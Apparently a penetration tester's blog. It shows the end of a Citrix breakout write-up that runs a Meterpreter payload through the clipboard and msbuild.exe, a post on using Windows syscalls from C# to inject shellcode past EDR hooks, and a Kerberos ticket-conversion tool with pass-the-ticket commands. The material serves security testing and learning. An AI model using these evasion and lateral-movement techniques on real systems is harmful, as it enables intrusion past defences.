Once the Powershell file is created, I leverage the fact that Powershell files are usually edited with Powershell ISE, or Integrated Scripting Environment. This just so happens to have a built-in Powershell instance for testing code as you write it. Let’s edit it and see what it opens with:

edit ps1 ISE

Shell yeah! We have another shell.

Getting C2, and a copy pasta problem

Once I gained a shell on the underlying box, I started doing some enumeration and discovered that outbound HTTP traffic was being filtered, presumably by an enterprise web proxy. So downloading tools or implants directly was out of the question, and not good OPSEC either. However, many C2 frameworks use HTTP for communication, so I needed to try something that worked over TCP, like Meterpreter. But how to get a payload on the box? HTTP was out, and dragging and dropping files does not work, just as it wouldn’t over RDP normally. But Citrix provides us a handy feature: a shared clipboard.

Here’s the gist: create a payload in a text format or a Base64 encoded binary and use the Powershell cmdlet Set-Clipboard to copy it into our local clipboard. Then on the remote box, save the contents of the clipboard to a file with Get-Clipboard > file. I wanted to avoid dropping a binary Meterpreter payload, so I opted for GreatSCT. This is a slick tool that lets you embed a Meterpreter payload within an XML file that can be parsed and run via msbuild.exe. MSbuild is a so-called “living off the land” binary, a Microsoft-signed executable that already exists on the box. It’s used by Visual Studio to perform build actions, as defined by an XML file or C# project file. Let’s see how it went.

I started by downloading GreatSCT on Kali Linux and creating an msbuild/meterpreter/rev_tcp payload:

GreatSCT

Here’s what the resulting XML payload looks like:

payload.xml

As I mentioned above, I copy the contents of the payload.xml file into the shared clipboard:

payload.xml

Then on the victim machine I copy it from the clipboard to the local file system:

payload.xml

I then start a MSF handler and execute the payload with msbuild.exe:

payload.xml

payload.xml

Shell yeah! We have a Meterpreter session, and the AV/EDR products haven’t given us any trouble.

Conclusions

There were a couple things I took away from this engagement, mostly revolving around the difficulty of providing partial access to Windows.

  • Locking down Windows is hard, so locking down Citrix is hard.

Citrix has security features designed to prevent access to the underlying operating system, but they inherently involve providing access to Windows applications while trying to prevent all the little ways of getting shells, accessing the file system, and exploiting application functionality. Reducing the attack surface of Windows is difficult, and by permitting partial access to the OS via Citrix, you inherit all of that attack surface.

  • Don’t allow access to dangerous features.

This application could have prevented the escapes I used by not allowing Excel’s VBA feature and blocking access to powershell.exe, as was done with cmd.exe. However I was informed that both features were vital to the operation of the .NET application. Without some very careful re-engineering of the application itself, application whitelisting, and various other hardening techniques, none of which are guaranteed to be 100% effective, it is very hard or impossible to present VB and Powershell functionality without allowing inadvertent shell access.

Using Syscalls to Inject Shellcode on Windows

1 June 2020 at 15:20

Using Syscalls to Inject Shellcode on Windows

After learning how to write shellcode injectors in C via the Sektor7 Malware Development Essentials course, I wanted to learn how to do the same thing in C#. Writing a simple injector that is similar to the Sektor7 one, using P/Invoke to run similar Win32 API calls, turns out to be pretty easy. The biggest difference I noticed was that there was not a directly equivalent way to obfuscate API calls. After some research and some questions on the BloodHound Slack channel (thanks @TheWover and @NotoriousRebel!), I found there are two main options I could look into. One is using native Windows system calls (AKA syscalls), or using Dynamic Invocation. Each have their pros and cons, and in this case the biggest pro for syscalls was the excellent work explaining and demonstrating them by Jack Halon (here and here) and badBounty. Most of this post and POC is drawn from their fantastic work on the subject. I know TheWover and Ruben Boonen are doing some work on D/Invoke, and I plan on digging into that next.

I want to mention that a main goal of this post is to serve as documentation for this proof of concept and to clarify my own understanding. So while I’ve done my best to ensure the information here is accurate, it’s not guaranteed to be 100%. But hey, at least the code works.

Said working code is available here

Native APIs and Win32 APIs

To begin, I want to cover why we would want to use syscalls in the first place. The answer is API hooking, performed by AV/EDR products. This is a technique defensive products use to inspect Win32 API calls before they are executed, determine if they are suspicious/malicious, and either block or allow the call to proceed. This is done by slightly the changing the assembly of commonly abused API calls to jump to AV/EDR controlled code, where it is then inspected, and assuming the call is allowed, jumping back to the code of the original API call. For example, the CreateThread and CreateRemoteThread Win32 APIs are often used when injecting shellcode into a local or remote process. In fact I will use CreateThread shortly in a demo of injection using strictly Win32 APIs. These APIs are defined in Windows DLL files, in this case MSDN tells us in Kernel32.dll. These are user-mode DLLs, which mean they are accessible to running user applications, and they do not actually interact directly with the operating system or CPU. Win32 APIs are essentially a layer of abstraction over the Windows native API. This API is considered kernel-mode, in that these APIs are closer to the operating system and underlying hardware. There are technically lower levels than this that actually perform kernel-mode functionality, but these are not exposed directly. The native API is the lowest level that is still exposed and accessible by user applications, and it functions as a kind of bridge or glue layer between user code and the operating system. Here’s a good diagram of how it looks:

Windows Architecture

You can see how Kernell32.dll, despite the misleading name, sits at a higher level than ntdll.dll, which is right at the boundary between user-mode and kernel-mode.

So why does the Win32 API exist? A big reason it exists is to call native APIs. When you call a Win32 API, it in turn calls a native API function, which then crosses the boundary into kernel-mode. User-mode code never directly touches hardware or the operating system. So the way it is able to access lower-level functionality is through native PIs. But if the native APIs still have to call yet lower level APIs, why not got straight to native APIs and cut out an extra step? One answer is so that Microsoft can make changes to the native APIs with out affecting user-mode application code. In fact, the specific functions in the native API often do change between Windows versions, yet the changes don’t affect user-mode code because the Win32 APIs remain the same.

So why do all these layers and levels and APIs matter to us if we just want to inject some shellcode? The main difference for our purposes between Win32 APIs and native APIs is that AV/EDR products can hook Win32 calls, but not native ones. This is because native calls are considered kernel-mode, and user code can’t make changes to it. There are some exceptions to this, like drivers, but they aren’t applicable for this post. The big takeaway is defenders can’t hook native API calls, while we are still allowed to call them ourselves. This way we can achieve the same functionality without the same visibility by defensive products. This is the fundamental value of system calls.

System Calls

Another name for native API calls is system calls. Similar to Linux, each system call has a specific number that represents it. This number represents an entry in the System Service Dispatch Table (SSDT), which is a table in the kernel that holds various references to various kernel-level functions. Each named native API has a matching syscall number, which has a corresponding SSDT entry. In order to make use of a syscall, it’s not enough to know the name of the API, such as NtCreateThread. We have to know its syscall number as well. We also need to know which version of Windows our code will run on, as the syscall numbers can and likely will change between versions. There are two ways to find these numbers, one easy, and one involving the dreaded debugger.

The first and easist way is to use the handy Windows system call table created by Mateusz “j00ru” Jurczyk. This makes it dead simple to find the syscall number you’re looking for, assuming you already know which API you’re looking for (more on that later).

WinDbg

The second method of finding syscall numbers is to look them up directly at the source: ntdll.dll. The first syscall we need for our injector is NtAllocateVirtualMemory. So we can fire up WinDbg and look for the NtAllocateVirtualMemory function in ntdll.dll. This is much easier than it sounds. First I open a target process to debug. It doesn’t matter which process, as basically all processes will map ntdll.dll. In this case I used good old notepad.

Opening Notepad in WinDbg

We attach to the notepad process and in the command prompt enter x ntdll!NtAllocateVirtualMemory. This lets us examine the NtAllocateVirtualMemory function within the ntdll.dll DLL. It returns a memory location for the function, which we examine, or unassemble, with the u command:

NtAllocateVirtualMemory Unassembled

Now we can see the exact assembly language instructions for calling NtAllocateVirtualMemory. Calling syscalls in assembly tends to follow a pattern, in that some arguments are setup on the stack, seen with the mov r10,rcx statement, followed by moving the syscall number into the eax register, shown here as mov eax,18h. eax is the register the syscall instruction uses for every syscall. So now we know the syscall number of NtAllocateVirtualMemory is 18 in hex, which happens to be the same value listed on in Mateusz’s table! So far so good. We repeat this two more times, once for NtCreateThreadEx and once for NtWaitForSingleObject.

Finding the syscall number for NtCreateThreadEx Finding the syscall number for NtWaitForSingleObject

Where are you getting these native functions?

So far the process of finding the syscall numbers for our native API calls has been pretty easy. But there’s a key piece of information I’ve left out thus far: how do I know which syscalls I need? The way I did this was to take a basic functioning shellcode injector in C# that uses Win32 API calls (named Win32Injector, included in the Github repository for this post) and found the corresponding syscalls for each Win32 API call. Here is the code for Win32Injector:

Win32Injector

This is a barebones shellcode injector that executes some shellcode to display a popup box:

Hello world from Win32Injector

As you can see from the code, the three main Win32 API calls used via P/Invoke are VirtualAlloc, CreateThread, and WaitForSingleObject, which allocate memory for our shellcode, create a thread that points to our shellcode, and start the thread, respectively. As these are normal Win32 APIs, they each have comprehensive documentation on MSDN. But as native APIs are considered undocumented, we may have to look elsewhere. There is no one source of truth for API documentation that I could find, but with some searching I was able to find everything I needed.

In the case of VirtualAlloc, some simple searching showed that the underlying native API was NtAllocateVirtualMemory, which was in fact documented on MSDN. One down, two to go.

Unfortunately, there was no MSDN documentation for NtCreateThreadEx, which is the native API for CreateThread. Luckily, badBounty’s directInjectorPOC has the function definition available, and already in C# as well. This project was a huge help, so kudos to badBounty!

Lastly, I needed to find documentation for NtWaitForSingleObject, which as you might guess, is the native API called by WaitForSingleObject. You’ll notice a theme where many native API calls are prefaced with “Nt”, which makes mapping them from Win32 calls easier. You may also see the prefix “Zw”, which is also a native API call, but normally called from the kernel. These are sometimes identical, which you will see if you do x ntdll!ZwWaitForSingleObject and x ntdll!NtWaitForSingleObject in WinDbg. Again we get lucky with this API, as ZwWaitForSingleObject is documented on MSDN.

I want to point out a few other good sources of information for mapping Win32 to native API calls. First is the source code for ReactOS, which is an open source reimplementation of Windows. The Github mirror of their codebase has lots of syscalls you can search for. Next is SysWhispers, by jthuraisamy. It’s a project designed to help you find and implement syscalls. Really good stuff here. Lastly, the tool API Monitor. You can run a process and watch what APIs are called, their arguments, and a whole lot more. I didn’t use this a ton, as I only needed 3 syscalls and it was faster to find existing documentation, but I can see how useful this tool would be in larger projects. I believe ProcMon from Sysinternals has similar functionality, but I didn’t test it out much.

Ok, so we have our Win32 APIs mapped to our syscalls. Let’s write some C#!

But these docs are all for C/C++! And isn’t that assembly over there…

Wait a minute, these docs all have C/C++ implementations. How do we translate them into C#? The answer is marshaling. This is the essence of what P/Invoke does. Marshaling is a way of making use of unmanaged code, e.g. C/C++, and using in a managed context, that is, in C#. This is easily done for Win32 APIs via P/Invoke. Just import the DLL, specify the function definition with the help of pinvoke.net, and you’re off to the races. You can see this in the demo code of Win32Injector. But since syscalls are undocumented, Microsoft does not provide such an easy way to interface with them. But it is indeed possible, through the magic of delegates. Jack Halon covers delegates really well here and here, so I won’t go too in depth in this post. I would suggest reading those posts to get a good handle on them, and the process of using syscalls in general. But for completeness, delegates are essentially function pointers, which allow us to pass functions as parameters to other functions. The way we use them here is to define a delegate whose return type and function signature matches that of the syscall we want to use. We use marshaling to make sure the C/C++ data types are compatible with C#, define a function that implements the syscall, including all of its parameters and return type, and there you have it!

Not quite. We can’t actually call a native API, since the only implementation of it we have is in assembly! We know its function definition and parameters, but we can’t actually call it directly the same way we do a Win32 API. The assembly will work just fine for us though. Once again, it’s rather simple to execute assembly in C/C++, but C# is a little harder. Luckily we have a way to do it, and we already have the assembly from our WinDbg adventures. And don’t worry, you don’t really need to know assembly to make use of syscalls. Here is the assembly for the NtAllocateVirtualMemory syscall:

NtAllocateVirtualMemory Assembly

As you can see from the comments, we’re setting up some arguments on the stack, moving our syscall number into the eax register, and using the magic syscall operator. At a low enough level, this is just a function call. And remember how delegates are just function pointers? Hopefully it’s starting to make sense how this is fitting together. We need to get a function pointer that points to this assembly, along with some arguments in a C/C++ compatible format, in order to call a native API.

Putting it all together

So we’re almost done now. We have our syscalls, their numbers, the assembly to call them, and a way to call them in delegates. Let’s see how it actually looks in C#:

NtAllocateVirtualMemory Code

Starting from the top, we can see the C/C++ definition of NtAllocateVirtualMemory, as well as the assembly for the syscall itself. Starting at line 38, we have the C# definition of NtAllocateVirtualMemory. Note that it can take some trial and error to get each type in C# to match up with the unmanaged type. We create a pointer to our assembly inside an unsafe block. This allows us to perform operations in C#, like operate on raw memory, that are normally not safe in managed code. We also use the fixed keyword to make sure the C# garbage collector does not inadvertently move our memory around and change our pointers. Once we have a raw pointer to the memory location of our shellcode, we need to change its memory protection to executable so it can be run directly, as it will be a function pointer and not just data. Note that I am using the Win32 API VirtualProtectEx to change the memory protection. I’m not aware of a way to do this via syscall, as it’s kind of a chicken and the egg problem of getting the memory executable in order to run a syscall. If anyone knows how to do this in C#, please reach out! Another thing to note here is that setting memory to RWX is generally somewhat suspicious, but as this is a POC, I’m not too worried about that at this point. We’re concerned with hooking right now, not memory scanning!

Now comes the magic. This is the struct where our delegates are declared:

Delegates Struct

Note that a delegate definition is just a function signature and return type. The implementation is up to us, as long as it matches the delegate definition, and it’s what we’re implementing here in the C# NtAllocateVirtualMemory function. At line 65 above, we create a delegate named assembledFunction, which takes advantage of the special marshaling function Marshal.GetDelegateForFunctionPointer. This method allows us to get a delegate from a function pointer. In this case, our function pointer is the pointer to the syscall assembly called memoryAddress. assembledFunction is now a function pointer to an assembly language function, which means we’re now able to execute our syscall! We can call assembledFunction delegate like any normal function, complete with arguments, and we will get the results of the NtAllocateVirtualMemory syscall. So in our return statement we call assembledFunction with the arguments that were passed in and return the result. Let’s look at where we actually call this function in Program.cs:

Calling NtAllocateMemory

Here you can see we make a call to NtAllocateMemory instead of the Win32 API VirtualAlloc that Win32Injector uses. We setup the function call with all the needed arguments (lines 43-48) and make the call to NtAllocateMemory. This returns a block of memory for our shellcode, just like VirtualAlloc would!

The remaining steps are similar:

Remaining Syscalls

We copy our shellcode into our newly-allocated memory, and then create a thread within our current process pointing to that memory via another syscall, NtCreateThreadEx, in place of CreateThread. Finally, we start the thread with a call to the syscall NtWaitForSingleObject, instead of WaitForSingleObject. Here’s the final result:

Hello World Shellcode

Hello world via syscall! Assuming this was some sort of payload running on a system with API hooking enabled, we would have bypassed it and successfully run our payload.

A note on native code

Some key parts of this puzzle I’ve not mentioned yet are all of the native structs, enumerations, and definitions needed for the syscalls to function properly. If you look at the screenshots above, you will see types that don’t have implementations in C#, like the NTSTATUS return type for all the syscalls, or the AllocationType and ACCESS_MASK bitmasks. These types are normally declared in various Windows headers and DLLs, but to use syscalls we need to implement them ourselves. The process I followed to find them was to look for any non-simple type and try to find a definition for it. Pinvoke.net was massively helpful for this task. Between it and other resources like MSDN and the ReactOS source code, I was able to find and add everything I needed. You can find that code in the Native.cs class of the solution here.

Wrapup

Syscalls are fun! It’s not every day you get to combine 3 different languages, managed and unmanaged code, and several levels of Windows APIs in one small program. That said, there are some clear difficulties with syscalls. They require a fair bit of boilerplate code to use, and that boilerplate is scattered all around for you to find like a little undocumented treasure hunt. Debugging can also be tricky with the transition between managed and unmanaged code. Finally, syscall numbers change frequently and have to be customized for the platform you’re targeting. D/Invoke seems to handle several of these issues rather elegantly, so I’m excited to dig into those more soon.

Rubeus to Ccache

17 May 2020 at 15:20

Rubeus to Ccache

I wrote a new little tool called RubeusToCcache recently to handle a use case I come across often: converting the Rubeus output of Base64-encoded Kerberos tickets into .ccache files for use with Impacket.

Background

If you’ve done any network penetration testing, red teaming, or Hack The Box/CTFs, you’ve probably come across Rubeus. It’s a fantastic tool for all things Kerebos, especially when it comes to tickets and Pass The Ticket/Overpass The Hash attacks. One of the most commonly used features of Rubeus is the ability to request/dump TGTs and use them in different contexts in Rubeus or with other tools. Normally Rubeus outputs the tickets in Base64-encoded .kirbi format, .kirbi being the type of file commonly used by Mimikatz. The Base64 encoding make it very easy to copy and paste and generally make use of the TGT in different ways.

You can also use acquired tickets with another excellent toolset, Impacket. Many of the Impacket tools can use Kerberos authentication via a TGT, which is incredibly useful in a lot of different contexts, such as pivoting through a compromised host so you can Stay Off the Land. Only one problem: Impacket tools use the .ccache file format to represent Kerberos tickets. Not to worry though, because Zer1t0 wrote ticket_converter.py (included with Impacket), which allows you to convert .kirbi files directly into .ccache files. Problem solved, right?

Rubeus To Ccache

Mostly solved, because there’s still the fact that Rubeus spits out .kirbi files Base64 encoded. Is it hard or time-consuming to do a simple little [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64RubeusTGT)) to get a .kirbi and then use ticket_converter.py? Not at all, but it’s still an extra step that gets repeated over and over, making it ripe for a little automation. Hence Rubeus to Ccache.

You pass it the Base64-encoded blob Rubeus gives you, along with a file name for a .kirbi file and a .ccache file, and you get a fresh ticket in both formats, ready for Impacket. To use the .ccache file, make sure to set the appropriate environment variable: export KRB5CCNAME=shiny_new_ticket.ccache. Then you can use most Impacket tools like this: wmiexec.py domain/[email protected] -k -no-pass, where the -k flag indicates the use of Kerberos tickets for authentication.

Usage

╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐  ┌┬┐┌─┐  ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐   │ │ │  ║  │  ├─┤│  ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘   ┴ └─┘  ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
              By Solomon Sklash
          github.com/SolomonSklash
   Inspired by Zer1t0's ticket_converter.py

usage: rubeustoccache.py [-h] base64_input kirbi ccache

positional arguments:
  base64_input  The Base64-encoded .kirbi, sucha as from Rubeus.
  kirbi         The name of the output file for the decoded .kirbi file.
  ccache        The name of the output file for the ccache file.

optional arguments:
  -h, --help    show this help message and exit

Thanks

Thanks to Zer1t0 and the Impacket project for doing most of the havy lifting.

❌
❌